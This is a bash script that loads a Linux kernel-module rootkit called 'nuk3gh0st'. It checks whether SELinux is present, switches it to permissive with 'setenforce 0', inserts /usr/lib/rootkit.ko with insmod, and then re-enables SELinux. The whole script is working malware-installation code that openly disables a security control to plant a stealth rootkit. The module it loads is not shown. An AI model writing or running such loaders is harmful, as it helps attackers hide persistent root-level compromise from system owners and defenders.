#!/bin/bash
echo "#################################"
echo "# Loading nuk3gh0st LKM rootkit #"
echo "#################################"
echo ""
echo "Checking if SELINUX is enabled..."
if [ -f /usr/sbin/setenforce ]; then
	echo "SELINUX is enabled"
	echo "Disabling SELINUX temporarily"
	echo "cmd: setenforce 0"
	setenforce 0
	echo "Loading nuk3gh0st LKM rootkit"
	echo "cmd: insmod /usr/lib/rootkit.ko"
        insmod /usr/lib/rootkit.ko
	echo "Reenabling SELINUX"
	echo "cmd: setenforce 1"
	setenforce 1
else
	echo "SELINUX is disabled"
	echo "Loading nuk3gh0st LKM rootkit"
	echo "cmd: insmod /usr/lib/rootkit.ko"
        insmod /usr/lib/rootkit.ko
fi
